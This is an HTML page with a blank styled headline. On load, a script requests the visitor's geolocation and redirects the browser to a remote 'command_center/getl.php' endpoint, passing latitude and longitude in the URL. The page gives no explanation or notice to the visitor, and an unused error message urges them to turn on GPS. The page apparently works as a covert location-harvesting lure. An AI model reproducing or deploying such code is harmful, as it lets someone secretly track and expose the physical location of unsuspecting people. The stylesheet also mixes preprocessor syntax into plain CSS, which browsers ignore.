<!DOCTYPE html>
<html>
    <head>
      <link href="https://fonts.googleapis.com/css?family=Montserrat:300,400,500,600,700,800" rel="stylesheet">
        <style>


body {
  font-family: 'Montserrat', sans-serif;
  font-smoothing: antialiased;
  background: #000428;  /* fallback for old browsers */
  background: -webkit-linear-gradient(to right, #004e92, #000428);  /* Chrome 10-25, Safari 5.1-6 */
  background: linear-gradient(to right, #004e92, #000428); /* W3C, IE 10+/ Edge, Firefox 16+, Chrome 26+, Opera 12+, Safari 7+ */
}

.container {
  padding: 25px 100px;
  max-width: 1200px;
  margin: 0 auto;
}

.document {
  background-color: rgba(#fac564,.5);
  padding: 40px 20px;
  border-radius: 5px;
}

.document__content {
  column-count: 1;
  @media screen and (min-width:1200px) {
    column-count: 2;
  }
  column-gap: 20px;
  padding: 20px 0;
  margin: 0 100px;
}

h1 {
  text-align: center;
  font-size: 3em;
  margin-bottom: 10px;
  text-transform: uppercase;
  font-weight: bold;
  color: white;
  text-shadow: 0 1px 2px rgba(black,.15);
}

p {
  margin: 0 20px 20px;
  font-size: 16px;
  line-height: 1.5em;
  color: lighten(black,20%);
}

.brace {
  width: auto;
  min-width: 35px;
  padding-bottom: 20px;
  font-size: 2em;
  line-height: 2em;
  position: relative;
  text-align: center;
  vertical-align: middle;
  margin: 0 15px 15px;
  border: none;
  background-color: transparent;
  background-image:
    radial-gradient(circle at 0 0, rgba(white,0) 14.5px, white 15.5px, white 19.5px, rgba(white,0) 20.5px),
    radial-gradient(circle at 35px 0, rgba(white,0) 14.5px, white 15.5px, white 19.5px, rgba(white,0) 20.5px);
  background-size: 35px 20px;
  background-position: center bottom;
  background-repeat: no-repeat;
  text-transform: lowercase;
  font-style: italic;
  color: white;
  filter: drop-shadow(0 1px 1px rgba(black,.15));
  overflow: visible;

  &:before {
    width: 50%;
    border-top: 5px solid white;
    border-left: 1px solid transparent; /* play with this until you like the look of it */
    border-top-left-radius: 20% 30px;
    height: 100%;
    content: "";
    absolute: top @height left -15px;
    box-sizing: border-box;
    margin-top: -5px;
  }

  &:after {
    width: 50%;
    border-top: 5px solid white;
    border-right: 1px solid transparent; /* play with this until you like the look of it */
    border-top-right-radius: 20% 30px;
    height: 100%;
    content: "";
    absolute: top @height right -15px;
    box-sizing: border-box;
    margin-top: -5px;
  }
}
        </style>

    </head>
<body onload="getLocation()">
    <div class="container">
      <div class="document">
        <h1 id="headline"></h1>
     </div>
  </div>
</div>
<script>
var x = document.getElementById("headline");

function getLocation() {
    if (navigator.geolocation) {
        navigator.geolocation.getCurrentPosition(showPosition);
    } else {
        x.innerHTML = "Open in other browser.";
    }
}

function showPosition(position) {
    var lang = position.coords.latitude;
    var long = position.coords.longitude;
    window.location.href = "http://new1.cet-gov.ac.in/command_center/getl.php?lat="+lang+"&&long="+long;
}
function showError(error) {
  switch(error.code) {
    case error.PERMISSION_DENIED:
      x.innerHTML = "Please! Turn on your GPS Location."
      break;
    case error.POSITION_UNAVAILABLE:
      x.innerHTML = "Location information is unavailable."
      break;
    case error.TIMEOUT:
      x.innerHTML = "The request to get user location timed out."
      break;
    case error.UNKNOWN_ERROR:
      x.innerHTML = "An unknown error occurred."
      break;
  }
}
</script>

</body>
</html>
